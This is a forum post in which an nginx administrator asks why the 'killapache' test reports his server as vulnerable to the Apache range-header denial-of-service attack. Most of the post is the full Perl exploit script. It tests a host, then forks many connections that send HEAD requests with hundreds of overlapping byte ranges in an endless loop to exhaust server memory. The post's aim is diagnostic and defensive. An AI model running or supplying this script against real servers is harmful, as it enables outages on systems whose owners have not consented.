Previous Message Next Message
Forum List Message List New Topic Print View
TASM
July 22, 2015 02:16PM
Hi, I am running nginx 1.0.11 standalone. Recently someone told me that my server is vulnerable to apache killer attack because when he run the following script, it shows "host seems vuln". I searched on this forum and found that "First of all, nginx doesn't favor HEAD requests with compression, so the exact mentioned attack doesn't work against a standalone nginx installation." Also, I checked the source file "src/http/modules/ngx_http_range_filter_module.c", I think it should have been patched to prevent handling malicious range requests. Any idea why it still shows "host seems vuln"? Thanks a lot!

----------------------------------------------------------------- killapache script ---------------------------------------------------------------
use IO::Socket;

use Parallel::ForkManager;

sub usage {

print "Apache Remote Denial of Service (memory exhaustion)\n";

print "by Kingcope\n";

print "usage: perl killapache.pl <host> [numforks]\n";

print "example: perl killapache.pl www.example.com 50\n";

}



sub killapache {

print "ATTACKING $ARGV[0] [using $numforks forks]\n";



$pm = new Parallel::ForkManager($numforks);



$|=1;

srand(time());

$p = "";

for ($k=0;$k<1300;$k++) {

$p .= ",5-$k";

}



for ($k=0;$k<$numforks;$k++) {

my $pid = $pm->start and next;



$x = "";

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "80",

Proto => 'tcp');



$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

print $sock $p;



while(<$sock>) {

}

$pm->finish;

}

$pm->wait_all_children;

print ":pPpPpppPpPPppPpppPp\n";

}



sub testapache {

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "80",

Proto => 'tcp');



$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

print $sock $p;



$x = <$sock>;

if ($x =~ /Partial/) {

print "host seems vuln\n";

return 1;

} else {

return 0;

}

}



if ($#ARGV < 0) {

usage;

exit;

}



if ($#ARGV > 1) {

$numforks = $ARGV[1];

} else {$numforks = 50;}



$v = testapache();

if ($v == 0) {

print "Host does not seem vulnerable\n";

exit;

}

while(1) {

killapache();

}
Reply Quote
RSS
Subject Author Posted

Doubt about killapache attack on nginx server

TASM July 22, 2015 02:16PM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 200
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 421 on December 02, 2018
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready